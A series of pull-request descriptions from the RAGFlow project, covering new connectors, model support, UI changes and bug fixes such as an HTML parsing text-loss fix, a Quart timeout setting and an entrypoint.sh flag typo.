### What problem does this PR solve?
Add metadata from moodle data source.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Make RAGFlow more asynchronous (part 2). #11551, #11579, #11619.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
Feat: add mineru auto installer
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Delete useless request hooks. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- The original `rag/nlp/rag_tokenizer.py` has been moved into Infinity and infinity-sdk
via https://github.com/infiniflow/infinity/pull/3117.
The new `rag/nlp/rag_tokenizer.py` imports `rag_tokenizer` from infinity and inherits from
`rag_tokenizer.RagTokenizer`.
- Bump infinity to 0.6.8
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Add MiniMax-M2 and remove deprecated models.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
### What problem does this PR solve?
Feat: Remove unnecessary dialogue-related code. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change:
new api /sequence2txt,
update QWenSeq2txt and ZhipuSeq2txt
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Files uploaded via the dialog box can be uploaded without binding
to a dataset. #9590
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: jina embedding issue #11614
Feat: Add jina embedding v4
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Try to make this more asynchronous. Verified in chat and agent
scenarios, reducing blocking behavior. #11551, #11579.
However, the impact of these changes still requires further
investigation to ensure everything works as expected.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Add fallbacks for MinerU output path. #11613, #11620.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The Quart framework has a default RESPONSE_TIMEOUT and BODY_TIMEOUT of 60
seconds.
This causes the frontend chat to hang after exactly 60 seconds when using
slow LLM backends (e.g., Ollama on CPU, or remote APIs with high latency).
This fix adds configurable timeout settings via environment variables with
sensible defaults (600 seconds = 10 minutes) to match other timeout
configurations in RAGFlow.
Fixes issues with chat timeout when:
- Using local Ollama on CPU (response time ~2 minutes)
- Using remote LLM APIs with high latency
- Processing complex RAG queries with many chunks
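
The environment-driven defaults described above can be sketched as follows. This is a minimal illustration, not the PR's code: the variable names `QUART_RESPONSE_TIMEOUT` and `QUART_BODY_TIMEOUT` and the helper `load_timeouts` are assumptions, while `RESPONSE_TIMEOUT` and `BODY_TIMEOUT` are Quart's own config keys.

```python
import os

DEFAULT_TIMEOUT_SECONDS = 600  # 10 minutes, the default described above


def load_timeouts(environ=os.environ):
    """Return Quart timeout settings, falling back to the default on bad input."""

    def read(name):
        raw = environ.get(name, "")
        try:
            value = int(raw)
        except ValueError:
            # Unset or non-numeric values fall back to the default.
            return DEFAULT_TIMEOUT_SECONDS
        return value if value > 0 else DEFAULT_TIMEOUT_SECONDS

    return {
        "RESPONSE_TIMEOUT": read("QUART_RESPONSE_TIMEOUT"),  # hypothetical variable name
        "BODY_TIMEOUT": read("QUART_BODY_TIMEOUT"),  # hypothetical variable name
    }
```

With a Quart application object, the result could be applied with `app.config.update(load_timeouts())`.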
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Grzegorz Sterniczuk <grzegorz@sternicz.uk>
### What problem does this PR solve?
Support for Redis 6+ ACL authentication (username)
Close #11606
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
This PR closes feature request #11286.
It adds the ability to choose the background theme of the _Full screen
chat_ that is embedded into a webpage.
It looks like this:
<img width="501" height="349" alt="image"
src="https://github.com/user-attachments/assets/e5fdfb14-9ed9-43bb-a40d-4b580985b9d4"
/>
It works similarly to `Locale`, using a URL parameter to set the theme.
If the parameter is invalid, the default theme is used.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Your Name <you@example.com>
### What problem does this PR solve?
Feat: create datasets from http api supports ingestion pipeline
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Error 102 "Can't find dialog by ID" when embedding agent with
from=agent. #11552
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Replace antd in the chat message with shadcn. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
When using `metadata_condition` for metadata filtering, if no
documents matched the filtering criteria, the system returned the
search results of all documents instead of an empty result.
Now, when `metadata_condition` has conditions but no documents match,
an empty result is returned.
#11572
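
The intended behavior can be sketched as below. This is an illustration under stated assumptions, not the PR's code: the function `retrieve`, the equality-only condition shape (`name`/`value`), and the `search` callback are all hypothetical.

```python
def retrieve(all_docs, metadata_condition, search):
    """Search only documents that pass the metadata filter, if one is given."""
    conditions = (metadata_condition or {}).get("conditions") or []
    if not conditions:
        return search(all_docs)  # no filter requested: search everything
    matched = [
        doc
        for doc in all_docs
        if all(doc["meta"].get(c["name"]) == c["value"] for c in conditions)
    ]
    if not matched:
        # A filter was requested but matched nothing: return an empty result
        # instead of silently widening the search to all documents.
        return []
    return search(matched)


docs = [{"id": 1, "meta": {"lang": "en"}}, {"id": 2, "meta": {"lang": "de"}}]


def search(candidates):
    # Stand-in for the real retrieval step.
    return [doc["id"] for doc in candidates]
```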
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Chenguang Wang <chenguangwang@deepglint.com>
### What problem does this PR solve?
Fix: Added styles for empty states on the page.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
optimize meta filter generation for better structure handling
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: doc_aggs not correctly returned when no chunks retrieved.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add GPT-5.1, GPT-5.1 Instant and Claude-Opus-4.5. #11548
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change:
remove garbage filtering rules
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete useless knowledge base, chat, and search files. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[#11541](https://github.com/infiniflow/ragflow/issues/11541)
change:
enable structured output for agent with tool
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add loop operator node. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
#10427
change:
new component Loop
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix errors caused by type mismatches when the various kinds of
exception responses are returned.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
##### Problem Description
When parsing HTML files, some page content may be lost.
For example, text inside nested `<font>` tags within multiple `<div>`
elements (e.g.,
`<div><font>Text_1</font></div><div><font>Text_2</font></div>`) fails to
be preserved correctly.
###### Root Cause #1: Block ID propagation is interrupted
1. **Block ID generation**: When the parser encounters a `<div>`, it
generates a new `block_id` because `<div>` belongs to `BLOCK_TAGS`.
2. **Recursive processing**: This `block_id` is passed down recursively
to process the `<div>`’s child nodes.
3. **Interruption occurs**: When processing a child `<font>` tag, the
code enters the `else` branch of `read_text_recursively` (since `<font>`
is a Tag).
4. **Bug location**: The first line in this `else` branch explicitly
sets **`block_id = None`**.
- This discards the valid `block_id` inherited from the parent `<div>`.
- Since `<font>` is not in `BLOCK_TAGS`, it does not generate a new
`block_id`, so it passes `None` to its child text nodes.
5. **Consequence**: The extracted text nodes have an empty `block_id` in
their `metadata`. During the subsequent `merge_block_text` step, these
texts cannot be correctly associated with their original `<div>` block
due to the missing ID. As a result, all text from `<font>` tags gets
merged together, which then triggers a second issue during
concatenation.
6. **Solution:** Remove the forced reset of `block_id` to `None`. When
the current tag (e.g., `<font>`) is not a block-level element, it should
inherit the `block_id` passed down from its parent. This ensures
consistent ownership across the hierarchy: `div` → `font` → `text`.
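
The inheritance rule from step 6 can be sketched on a toy tree. This is a simplified illustration, not the parser's code: the tuple-based node representation, the function signature, and the reduced `BLOCK_TAGS` set are assumptions.

```python
import uuid

BLOCK_TAGS = {"div", "p"}  # illustrative subset, not the parser's full list


def read_text_recursively(node, block_id=None, out=None):
    """Collect (text, block_id) pairs; node is a str or a (tag, children) tuple."""
    out = [] if out is None else out
    if isinstance(node, str):
        out.append((node, block_id))
        return out
    tag, children = node
    # Only block-level tags start a new block. Inline tags such as <font>
    # keep the block_id inherited from their parent instead of resetting it.
    if tag in BLOCK_TAGS:
        block_id = uuid.uuid4().hex
    for child in children:
        read_text_recursively(child, block_id, out)
    return out


tree = ("body", [("div", [("font", ["Text_1"])]), ("div", [("font", ["Text_2"])])])
pairs = read_text_recursively(tree)
```

Each text node ends up tagged with the ID of its enclosing `<div>`, so the two texts stay in separate blocks.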
###### Root Cause #2: Data loss during text concatenation
1. The line `current_content += (" " if current_content else "" +
content)` has a misplaced parenthesis. When `current_content` is
non-empty (`True`):
- The ternary expression evaluates to `" "` (a single space).
- The code executes `current_content += " "`.
- **Result**: Only a space is appended—**the new `content` string is
completely discarded**.
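
The precedence problem can be reproduced in isolation. The helper names below are hypothetical, and the second function shows one way to correct the expression, which may differ from the exact change in the PR.

```python
def append_buggy(current_content, content):
    # Parsed as: " " if current_content else ("" + content)
    current_content += (" " if current_content else "" + content)
    return current_content


def append_fixed(current_content, content):
    # The conditional only chooses the separator; content is always appended.
    current_content += (" " if current_content else "") + content
    return current_content
```

With a non-empty `current_content`, `append_buggy` adds only the separator, while `append_fixed` adds the separator followed by `content`.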
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update sync data source to handle metadata properly
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Refactoring and enhancing the functionality of the delete
confirmation dialog component
- Refactoring and enhancing the functionality of the delete confirmation
dialog component
- Modifying the style of the user center
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR adds webdav storage as data source for data sync service.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### Type of change
* [x] New Feature (non-breaking change which adds functionality)
Add support for Virtual Hosted Style and Path Style URL addressing in
S3_COMPATIBLE storage connector. Default to Virtual Hosted Style for
better compatibility with COS and other S3-compatible services.
- Add addressing_style field to credentials (virtual/path)
- Update frontend form with selection dropdown
- Add validation and tooltips for S3 Compatible endpoint URL
<img width="703" height="875" alt="image"
src="https://github.com/user-attachments/assets/af5ba7ca-f160-47fa-8ba1-32eace8f5fdf"
/>
<img width="1620" height="788" alt="image"
src="https://github.com/user-attachments/assets/6012b5ce-8bcb-478e-a9cb-425f886d5046"
/>
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: support operator in/not in for metadata filter. #11376, #11378
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Modify the style of your personal center
Add resizable component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: After saving the model parameters of the chat page, the parameter
disappears. #11500
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add new options to the RAG server scripts to create the super admin user
when the server starts.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
Co-authored-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: coroutine object has no attribute get
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Modify the personal center style #10703
- All form-label font styles are no longer bold
- Menus are not highlighted on first visit to the personal center
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Description
This PR fixes a bug where Nginx fails to start when using the
`ragflow.https.conf` configuration. The upstream host `ragflow` was not
resolving correctly inside the container context, causing an `[emerg]
host not found` error.
### Changes
- Updated `docker/nginx/ragflow.https.conf`: Changed upstream host from
`ragflow` to `localhost` for both the admin API and the main API.
### Related Issue
Fixes #11453
### Testing
- [x] Enabled HTTPS config in Docker.
- [x] Verified Nginx starts successfully without "host not found"
errors.
- [x] Verified API accessibility.
### What problem does this PR solve?
This PR adds a native Moodle connector to sync content (courses,
resources, forums, assignments, pages, books) into RAGFlow.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add auth header for Ollama chat model. #11350
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Resolve the issue of sessions not being saved when the variable is
of type `array<object>`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Enable logical operators in metadata. #11387, #11376
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Ignore chunk size when using custom delimiter.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- Add whitespace validation to the PDF English text checking regex
- Reduce false negatives in English PDF content recognition
### What problem does this PR solve?
The core idea is to **expand the regex content used for English text
detection** so it can accommodate more valid characters commonly found
in English PDFs. The modifications include:
- Adding support for **space** in the regex.
- Ensuring the update does not reduce existing detection accuracy.
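
The effect of allowing spaces can be illustrated with two hypothetical patterns. Neither is the regex actually used by the PDF parser; both simply require a run of at least 30 "English-looking" characters.

```python
import re

# Hypothetical patterns, identical except that the second allows a space.
WITHOUT_SPACE = re.compile(r"[a-zA-Z0-9,.;:()!?-]{30,}")
WITH_SPACE = re.compile(r"[ a-zA-Z0-9,.;:()!?-]{30,}")

sample = "The quick brown fox jumps over the lazy dog near the river."


def looks_english(pattern, text):
    """Return True when the text contains a long enough run of allowed characters."""
    return pattern.search(text) is not None
```

Ordinary English prose rarely contains 30 consecutive non-space characters, so a character class without the space rejects `sample`, while the version with the space accepts it.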
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: UI adjustments, replacing private components with public components
- UI adjustments for public components (input, multiselect,
SliderInputFormField)
- Replacing the private LlmSettingFieldItems component in search with
the public LlmSettingFieldItems component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add a loop variable to the loop operator. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Give the <Input> component suitable horizontal padding when it has a
prefix or suffix icon
- Slightly change the visual effect of <ThemeSwitch> in the admin UI
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Modify the style of the user center
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: missing parameters in by_plaintext method for PDF naive mode
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: lih <dev_lih@139.com>
### What problem does this PR solve?
Enriches rich text (links, mentions, equations), flags to-do blocks with
[x]/[ ], captures block-level equations, builds table HTML, downloads
attachments.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: add more chunking method #11311
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change:
improve multi-column document detection
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Outputs data is directly synchronized to the canvas without going
through the form. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Incorrect retrieval total count with pagination enabled.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: incorrect parameter usage #8084
Fix: Optimize edge check #10851
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
#11293
change:
RagFlow not starting with Postgres DB
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Use array syntax in order to prevent parameter quoting issues. This also
runs the command directly without a bash process, which means signals
(like SIGTERM) will be delivered directly to the server process.
Fixes issue #11390
### What problem does this PR solve?
`${REDIS_PASSWORD}` was not passed correctly, meaning that if it was unset or
contained spaces (or shell code!) it was interpreted wrongly.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Resolve the issue of missing thinking labels when viewing pre-existing
conversations
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Documentation Update
- [x] Other (please describe):
### What problem does this PR solve?
- Added TCADP Parser configuration fields to PDF, PPT, and spreadsheet
parsing forms
- Implemented support for setting table result type (Markdown/HTML) and
Markdown image response type (URL/Text)
- Updated TCADP Parser to handle return format settings from
configuration or parameters
- Enhanced frontend to dynamically show TCADP options based on selected
parsing method
- Modified backend to pass format parameters when calling TCADP API
- Optimized form default value logic for TCADP configuration items
- Updated multilingual resource files for new configuration options
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes #10933
This PR fixes a `TypeError` in the Gemini model provider where the
`total_token_count_from_response()` function could receive a `None`
response object, causing the error:
`TypeError: argument of type 'NoneType' is not iterable`
**Root Cause:**
The function attempted to use the `in` operator to check dictionary keys
(lines 48, 54, 60) without first validating that `resp` was not `None`.
When Gemini's `chat_streamly()` method returns `None`, this triggers the
error.
**Solution:**
1. Added a null check at the beginning of the function to return `0` if
`resp is None`
2. Added `isinstance(resp, dict)` checks before all `in` operations to
ensure type safety
3. This defensive programming approach prevents the TypeError while
maintaining backward compatibility
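
The guard pattern described in the solution can be sketched as follows. This is a simplified illustration rather than the contents of `rag/utils/__init__.py`: the nested key names (`total_tokens`, `tokens`, `input_tokens`, `output_tokens`) are assumptions about the response layout.

```python
def total_token_count_from_response(resp):
    """Best-effort token count; returns 0 when nothing usable is found."""
    if resp is None:
        return 0  # e.g. a streaming call that produced no final response object
    # The `in` operator is only applied after confirming resp is a dict.
    if isinstance(resp, dict) and "usage" in resp and "total_tokens" in resp["usage"]:
        return resp["usage"]["total_tokens"]
    if isinstance(resp, dict) and "meta" in resp and "tokens" in resp["meta"]:
        tokens = resp["meta"]["tokens"]
        return tokens.get("input_tokens", 0) + tokens.get("output_tokens", 0)
    return 0
```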
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Changes Made
**File:** `rag/utils/__init__.py`
- Line 36-38: Added `if resp is None: return 0` check
- Line 52: Added `isinstance(resp, dict)` before `'usage' in resp`
- Line 58: Added `isinstance(resp, dict)` before `'usage' in resp`
- Line 64: Added `isinstance(resp, dict)` before `'meta' in resp`
### Testing
- [x] Code compiles without errors
- [x] Follows existing code style and conventions
- [x] Change is minimal and focused on the specific issue
### Additional Notes
This fix ensures robust handling of various response types from LLM
providers, particularly Gemini, w
---------
Signed-off-by: Zhang Zhefang <zhangzhefang@example.com>
### What problem does this PR solve?
Add OceanBase doc engine. Close #5350
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
**Cohere rerank base_url default handling**
- Background: When no rerank base URL is configured, the settings
pipeline was passing an empty string through RERANK_CFG →
TenantLLMService → CoHereRerank, so the Cohere client received
base_url="" and produced “missing protocol” errors during rerank calls.
- What changed: The CoHereRerank constructor now only forwards base_url
to the Cohere client when it isn’t empty/whitespace, causing the client
to fall back to its default API endpoint otherwise.
- Why it matters: This prevents invalid URL construction in the rerank
workflow and keeps tests/sanity checks that rely on the default Cohere
endpoint from failing when no custom base URL is specified.
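
The "only forward when non-empty" rule can be sketched as a small helper. The function name `cohere_client_kwargs` is hypothetical and the code is not taken from `CoHereRerank`; it only shows how an empty or whitespace-only URL can be dropped before the client is constructed.

```python
def cohere_client_kwargs(api_key, base_url=None):
    """Build keyword arguments for the Cohere client constructor."""
    kwargs = {"api_key": api_key}
    # Forward base_url only when it carries a real value. An empty or
    # whitespace-only string is dropped so that the client falls back to
    # its built-in default endpoint.
    if base_url and base_url.strip():
        kwargs["base_url"] = base_url.strip()
    return kwargs
```

The resulting dictionary would then be unpacked into the client constructor, so `base_url` is absent rather than empty when no custom endpoint is configured.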
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Philipp Heyken Soares <philipp.heyken-soares@am.ai>
### What problem does this PR solve?
Feat: Fixed an issue where modifying fields in the agent operator caused
the loss of structured data. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Users currently can’t view `git checkout v0.22.1` directly. They need to
scroll the code block all the way to the right to see it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: If a query variable in a data manipulation operator is deleted, a
warning message should be displayed to the user. #10427, #11255
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The key for the begin operator can only contain alphanumeric
characters and underscores. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Structured data will still be stored in outputs for compatibility
with older versions. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Set the outputs type of list operation. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: bbox not included in mineru output #11315
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add Gemini 3 Pro preview.
Change `GenerativeModel` to `genai`.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
One loop to get better performance
### Type of change
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: Fixed an issue where variable aggregation operators could not be
connected to other operators. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
As title
### Type of change
- [x] Other (please describe): Update version info
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Feat: Display variables in the variable assignment node. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
https://github.com/infiniflow/ragflow/issues/10427
change:
new component variable assigner
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add a switch to control the display of structured output to the
agent form. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
No results can be found through the API /api/v1/dify/retrieval. #11307
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#11319](https://github.com/infiniflow/ragflow/issues/11319)
change:
limit random sampling range in check_embedding
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: manual parser with mineru #11320
Fix: missing parameter in mineru #11334
Fix: add outlines parameter for pdf parsers
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: add describe_image_with_prompt for ZHIPU AI #11289
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Fixed the issue where form data assigned by variables was not
updated in real time. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
There's a typo in `entrypoint.sh` on line 74: the case statement uses
`--disable-datasyn)` (missing the 'c'), while the usage function and
documentation correctly show `--disable-datasync` (with the 'c'). This
mismatch causes the `--disable-datasync` flag to be unrecognized,
triggering the usage message and causing containers to restart in a loop
when this flag is used.
**Background:**
- Users following the documentation use `--disable-datasync` in their
docker-compose.yml
- The entrypoint script doesn't recognize this flag due to the typo
- The script calls `usage()` and exits, causing Docker containers to
restart continuously
- This makes it impossible to disable the data sync service as intended
**Example scenario:**
When a user adds `--disable-datasync` to their docker-compose command
(as shown in examples), the container fails to start properly because
the argument isn't recognized.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Proposed Solution
Fix the typo on line 74 of `entrypoint.sh` by changing:
```bash
--disable-datasyn)
```
to:
```bash
--disable-datasync)
```
This matches the spelling used in the usage function (lines 9 and 13) and
allows the flag to work as documented.
### Changes Made
- Fixed typo in `entrypoint.sh` line 74: changed `--disable-datasyn)` to
`--disable-datasync)`
- This ensures the argument matches the documented flag name and usage
function
---
**Code change:**
```bash
# Line 74 in entrypoint.sh
# Before:
--disable-datasyn)
ENABLE_DATASYNC=0
shift
;;
# After:
--disable-datasync)
ENABLE_DATASYNC=0
shift
;;
```
This is a simple one-character fix that resolves the argument parsing
issue.
### What problem does this PR solve?
change:
update check_embedding failed info
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
PR for implementing s3 compatible storage units #11240
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed an issue where adding session variables multiple times would
overwrite them.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Jason <ggbbddjm@gmail.com>
### What problem does this PR solve?
Feat: Construct a dynamic variable assignment form #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: concat images in word document. Partially solved issues in #11063
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: create dataset return type inconsistent #11167
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes an issue where default models which used the same factory but
different base URLs would all be initialised with the default chat
model's base URL and would ignore e.g. the embedding model's base URL
config.
For example, with the following service config, the embedding and
reranker models would end up using the base URL for the default chat
model (i.e. `llm1.example.com`):
```yaml
ragflow:
  service_conf:
    user_default_llm:
      factory: OpenAI-API-Compatible
      api_key: not-used
      default_models:
        chat_model:
          name: llm1
          base_url: https://llm1.example.com/v1
        embedding_model:
          name: llm2
          base_url: https://llm2.example.com/v1
        rerank_model:
          name: llm3
          base_url: https://llm3.example.com/v1/rerank
  llm_factories:
    factory_llm_infos:
      - name: OpenAI-API-Compatible
        logo: ""
        tags: "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION"
        status: "1"
        llm:
          - llm_name: llm1
            base_url: 'https://llm1.example.com/v1'
            api_key: not-used
            tags: "LLM,CHAT,IMAGE2TEXT"
            max_tokens: 100000
            model_type: chat
            is_tools: false
          - llm_name: llm2
            base_url: https://llm2.example.com/v1
            api_key: not-used
            tags: "TEXT EMBEDDING"
            max_tokens: 10000
            model_type: embedding
          - llm_name: llm3
            base_url: https://llm3.example.com/v1/rerank
            api_key: not-used
            tags: "RERANK,1k"
            max_tokens: 10000
            model_type: rerank
```
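
The expected resolution can be sketched as below. This is an illustration only: `resolve_base_url` is a hypothetical helper, not a RAGFlow function, and the dictionary mirrors the `default_models` section of the config above.

```python
def resolve_base_url(model_cfg, factory_default=""):
    """Prefer the model's own base_url; use the factory-level value only as a fallback."""
    return model_cfg.get("base_url") or factory_default


default_models = {
    "chat_model": {"name": "llm1", "base_url": "https://llm1.example.com/v1"},
    "embedding_model": {"name": "llm2", "base_url": "https://llm2.example.com/v1"},
    "rerank_model": {"name": "llm3", "base_url": "https://llm3.example.com/v1/rerank"},
}

# Each model type resolves to its own URL rather than the chat model's.
resolved = {kind: resolve_base_url(cfg) for kind, cfg in default_models.items()}
```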
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue of not being able to select the time zone in the
user center.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
1. remove redundant code
2. fix MinerU performance issue
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Doc: add default username & pwd
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Feat: extract message output to file
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
pr:
#11276
change:
ListOperations does not support sorting arrays of objects.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Added the ability to download files in the agent message reply
function.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
https://github.com/infiniflow/ragflow/issues/10427
change:
new component list operations
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Correctly check task executor alive and display status.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Remove legacy accounts and passwords.
### What problem does this PR solve?
Remove leftover account and password in
agent/templates/sql_assistant.json
### Type of change
- [x] Other (please describe):
### What problem does this PR solve?
Fixes: Added session variable types and modified configuration
- Added more types of session variables
- Modified the embedding model switching logic in the knowledge base
configuration
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
As title
### Type of change
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
pr:
#10854
change:
update check_embedding api
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add fault-tolerant mechanism to RAPTOR.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix some IDE warnings
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
- Updated tests to reflect new behavior of handling duplicate dataset
names
- Instead of returning an error, the system now appends "(1)" to
duplicate names
- This problem was introduced by PR #10960
### Type of change
